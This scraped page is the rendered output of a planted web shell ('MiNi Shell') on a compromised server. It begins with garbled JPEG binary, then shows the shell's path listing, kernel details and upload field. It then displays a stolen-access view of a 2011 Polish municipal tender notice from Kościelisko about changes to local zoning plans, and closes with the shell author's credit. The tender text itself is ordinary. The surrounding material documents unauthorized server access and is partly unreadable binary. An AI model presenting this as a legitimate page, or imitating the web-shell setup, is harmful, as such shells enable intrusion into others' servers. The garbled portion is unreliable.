JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110207/43409-N-2011.html

<p class="kh_header"><b>Kościelisko: Sporządzenie dziesięciu zmian punktowych 
w obowiązujących miejscowych planach zagospodarowania przestrzennego 
Gminy Kościelisko</b><br>
<b>Numer ogłoszenia: 43409 - 2011; data zamieszczenia: 07.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kościelisko , ul. Strzelców Podhalańskich 44, 34-511 Kościelisko, woj. małopolskie, tel. 018 2079100.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.koscielisko.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sporządzenie dziesięciu zmian punktowych 
w obowiązujących miejscowych planach zagospodarowania przestrzennego 
Gminy Kościelisko.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest sporządzenie dziesięciu zmian punktowych w obowiązujących miejscowych planach zagospodarowania przestrzennego gminy Kościelisko wraz z przygotowaniem map do celów projektowych lub map do celów planistycznych, dla:  

1) czterech zmian na terenie sołectwa Kościelisko: 
w rejonie ulic Budzówka i Rysulówka, w rejonie Pitoniówka, dla dz. 958, 959, 960, 968-5 w rejonie Polany Blachówka -w rejonie Sobiczkowa Bór 
2) dwóch zmian na terenie sołectwa Witów:
-     obszar obejmujący przysiółek Biały Potok, 
		         -     teren położony w południowej części Roli Szatanowej 
3) czterech zmian na terenie sołectwa Dzianisz:
		          -    w rejonie Wójtostwo 
		           -    w rejonie Zagrody Witowskie - część południowa 		           -    w rejonie  Polana (
		           -    dla dz. nr ew.: 8418-15, 8418-26 (
	Treść i zakres zmian zostały określone w uchwałach oraz załącznikach graficznych do w/w uchwał podjętych w dniu 29 października 2010 roku, publikowanych na BIP Gminy Kościelisko 
Orientacyjna łączna powierzchnia terenów objętych zmianami wynosi około 24,95 ha, z czego, dla poszczególnych zmian przedmiotowe powierzchnie kształtują się następująco:

Kościelisko
- Uchwała Rady Gminy Kościelisko 				4,6 ha
- Uchwała Rady Gminy Kościelisko 				5,5 ha
- Uchwała Rady Gminy Kościelisko  				0,6 ha
- Uchwała Rady Gminy Kościelisko 			2,5 ha

Witów
- Uchwała Rady Gminy Kościelisko 		       	0,15 ha
- Uchwała Rady Gminy Kościelisko 				1,5 ha

Dzianisz:
- Uchwała Rady Gminy Kościelisko 			4,6 ha
- Uchwała Rady Gminy Kościelisko 			2,0 ha
- Uchwała Rady Gminy Kościelisko 			3,0 ha
- Uchwała Rady Gminy Kościelisko 			0,5 ha


	Wykonawca jest zobowiązany do wykonania wszelkich czynności niezbędnych  do prawidłowego i kompletnego przeprowadzenia procedury wynikających z art. 17 ustawy z dnia 27 marca 2003 o planowaniu i zagospodarowaniu przestrzennym (Dz. U. nr 80 poz. 717 ze zmianami) oraz ustawy z dnia 3 października 2008r o udostępnianiu informa-cji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na śro-dowisko (Dz. U. Nr 199, poz. 1227 ze zm.). 

Opracowania winny spełniać obowiązujące przepisy prawa (zakres, forma oraz procedury wykonania). 

Do obowiązków Wykonawcy, dla każdego zadania, należy w szczególności:

1.	Przed przystąpieniem do zasadniczych prac projektowych - dokonanie rozpoznania sytuacji terenowej;
2.	Przygotowanie przez uprawnionego geodetę map do celów projektowych lub map do celów planistycznych             w odpowiedniej skali 1:1000 lub 1:500 - przekazanie 1 oryginału mapy do urzędu, mapa winna być przyjęta do państwowego zasobu geodezyjnego i kartograficznego
3.	Przygotowanie ogłoszeń, zawiadomień, obwieszczeń oraz wystąpień o opinie i uzgodnienia;
o których mowa w ustawie z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym oraz ustawie z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko; a także innych pism, wyjaśnień w sprawach poszczególnych zadań
4.	Sporządzenie ekofizjografii;
5.	Sporządzenie projektu zmiany planu;
6.	Sporządzenie prognozy oddziaływania na środowisko;
7.	Sporządzenie prognozy skutków finansowych uchwalenia zmiany planu miejscowego;
8.	Zajęcie stanowiska do złożonych wniosków i uwag wniesionych do projektu zmiany planu;
9.	Dostarczenie kompletnego opracowania do uchwalenia;
10.	Przygotowanie podsumowania i uzasadnienia w sprawie strategicznej oceny oddziaływania na środowisko;
11.	Udział w posiedzeniach Gminnej Komisji Urbanistyki i Architektury oraz Komisji Planu Przestrzennego Zagospodarowania i Inwentaryzacji Mienia Komunalnego Rady Gminy Kościelisko, dyskusjach publicznych, sesjach Rady Gminy Kościelisko - dotyczących poszczególnych zadań;
12.	Skompletowanie dokumentacji formalno-prawnej celem przekazania do Wojewody;
		 
		
1)	Zmiana planu dla każdego zadania sporządzona zostanie w postaci integralnie ze sobą związanych części:
1)	Części tekstowej uchwały stanowiącej uchwałę  Rady Gminy Kościelisko 
2)	Części rysunkowej, stanowiącej załącznik graficzny zawierający rysunek zmiany planu w skali 1:1000 lub 1:500. 
2)	Wykonawca odpowiada za zgodność dokumentacji w wersji elektronicznej z oryginałem w wersji papierowej.
3)	Wykonawca odpowiada za zgodność opracowań oraz rysunków i tekstu zmian planów z przepisami prawa,  jakość, przydatność oraz aktualność map do celów projektowych lub map do celów planistycznych sporządzonych w odpo-wiedniej skali 1:1000 lub 1:500, 
4)	Opracowania projektowe, dla każdego zadania, należy wykonać, w wersji papierowej i elektronicznej, w ilości: 
1). do weryfikacji na etapie koncepcji (po min 2 egzemplarze w formie papierowej i elektronicznej) - tekst i rysunek   	      planu,
2.) niezbędnej do zaopiniowania i uzgodnień w formie papierowej i elektronicznej:  stosownie do rozdzielnika tekst   	      i rysunek planu, tekst i rysunek prognozy oddziaływania na środowisko (min.  3 egzemplarze), tekst i rysunki 		      opracowania ekofizjograficznego (min. 2 egzemplarze), prognoza skutków finansowych (min. 2 egzemplarze) 
3).  niezbędnej do uchwalenia przez Radę Gminy Kościelisko (min. po 5 egzemplarzy w formie papierowej i elektro-	      nicznej) - tekst i rysunek planu
5)	Kompletne końcowe opracowanie projektowe, stanowiące przedmiot umowy, które Wykonawca przekaże Zamawia-jącemu składać się będzie z:
1).     rysunku zmiany planu w wersji papierowej - w ilości 5 egz., w tym 2 kolorowych, 
             2).     tekstu zmiany planu w wersji papierowej - w ilości 5 egz.,
3).     elektronicznej wersji rysunku i tekstu planu - zapis na nośniku elektronicznym 5 egz.,
4).     teczki dokumentów formalno-prawnych oraz materiałów związanych ze sporządzeniem zmiany planu 		      miejscowego.
	
	Wersja elektroniczna winna być sporządzona - teksty w formatach Word, PDF, rysunki : JPG, TIF, Corel; zapis na 	płycie CD..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.40.00.00-2, 71.35.40.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 15.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Przystępując do przetargu Wykonawcy zobowiązani są wnieść wadium w wysokości 2 000,00 zł (słownie: dwa tysiące  złotych 00 100).
2.	Wadium może być wnoszone w jednej lub kilku następujących formach:
-	pieniądzu,
-	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
-	gwarancjach bankowych,
-	gwarancjach ubezpieczeniowych,
-	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b  ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późniejszymi zmiana-mi).
3.	Wadium wnoszone w pieniądzu wpłaca się przelewem z rachunku bankowego Wykonawcy na rachunek bankowy Zamawiającego: PBS o Zakopane numer rachunku 03 8821-0009-0000-0000-1443-0006 (z dopiskiem wadium przetar-gowe - ZP.341-6-2011).
4.	Wadium należy wnieść przed upływem terminu składania ofert tj. do dnia 15 lutego 2011 roku do godz. 10.00. (Decy-duje data uznania wpłaty na rachunku Zamawiającego).
5.	Wadium musi obejmować okres związania ofertą.
6.	Oferta, która nie będzie zabezpieczona akceptowaną przez Zamawiającego formą wadium zostanie wykluczona z postępowania przetargowego.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonywana metodą spełnia-nie spełnia. Wykonawca spełni ww. warunek jeżeli złoży oświadczenie o spełnianiu warunków zgodnie z art. 22 ust. 1 ustawy Pzp, według wzo-ru stanowiącego załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonywana metodą spełnia-nie spełnia Wykonawca spełni ww. warunek jeżeli złoży oświadczenie o spełnianiu warunków zgodnie z art. 22 ust. 1 ustawy Pzp, według  	wzoru stanowiącego załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonywana metodą spełnia-nie spełnia Wykonawca spełni ww. warunek jeżeli złoży oświadczenie o spełnianiu warunków zgodnie z art. 22 ust. 1 ustawy Pzp, według  	wzoru stanowiącego załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonywana metodą spełnia-nie spełnia 
Wykonawca spełni ww. warunek jeżeli  złoży oświadczenie że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiada-	ją uprawnienia  do  projektowania zgodnie z art. 5 ustawy z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzen-	nym oraz art. 2 ust. 3 i art. 6 ust. 1 ustawy z dnia 15 grudnia 2000r. o samorządach zawodowych architektów, inżynierów budow-	nictwa oraz urbanistów, według wzoru stanowiącego załącznik nr  4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonywana metodą spełnia-nie spełnia
Wykonawca spełni ww. warunek jeżeli złoży oświadczenie o spełnianiu warunków zgodnie z art. 22 ust. 1 ustawy Pzp, według  	wzoru stanowiącego załącznik nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Istotne postanowienia zawarte są w projekcie umowy stanowiącym załącznik nr 5 do SIWZ.
2.	Przyjęcie warunków przetargu przez Wykonawcę jest jednoznaczne z przyjęciem warunków umowy proponowanych przez Zamawiającego.
3.	Postanowienia zawarte w projekcie umowy mogą ulec zmianie w następujących przypadkach:
1)	W przypadku wystąpienia okoliczności, których nie można było przewidzieć w chwili wyboru najkorzystniej-szej oferty.
2)	W przypadku gdy opracowanie zmiany dla poszczególnych zadań stanie się nie możliwe względu na wobec zaistnienia uprzednio nie przewidzianych okoliczności.
3)	W przypadku zmiany danych teleadresowych, osób reprezentujących firmę, kluczowych specjalistów - na wniosek Zamawiającego lub Wykonawcy.
4)	W przypadku szczególnie niesprzyjających warunków atmosferycznych.
5)	W przypadku zmian w dokumentacji dokonanych na wniosek Zamawiającego.
6)	W przypadku opóźnienia przekazania terenu realizacji robót.
7)	W przypadku zmiany przepisów prawnych istotnych dla realizacji przedmiotu umowy.
8)	W przypadku przedłużenia procedur administracyjnych na etapie wydawania opinii, uzgodnień, postanowień i decyzji administracyjnych, wynikających z procedury wykonywanej obecnie zmiany studium uwarunkowań 
i kierunków zagospodarowania przestrzennego Gminy Kościelisko
9)	W przypadku przedłużenia procedur administracyjnych na etapie wydawania opinii, uzgodnień, postanowień i decyzji administracyjnych.
10)	Konieczności zmiany harmonogramu robót, na skutek działania siły wyższej, zdarzeń losowych oraz działań władz i organów Państwa;
11)	W przypadku wystąpienia robót zamiennych.
12)	 W przypadku zmiany stawki podatku VAT.
13)	 W przypadku gdy zmiany treści umowy są korzystne dla Zamawiającego a Wykonawca nie wyrazi sprzeciwu   co do  wprowadzenia tych zmian.
4.	Zmiany umowy nie mogą być dokonywane w stosunku do kryteriów, które były oceniane w postępowaniu przetar-gowym</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.koscielisko.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Kościelisko ul. Strzelaców Podhalańskich 44, 34-511 Kościelisko, pok nr 11..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.02.2011 godzina 10:00, miejsce: Urząd Gminy Kościelisko ul. Strzelaców Podhalańskich 44, 34-511 Kościelisko, pok nr 7..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com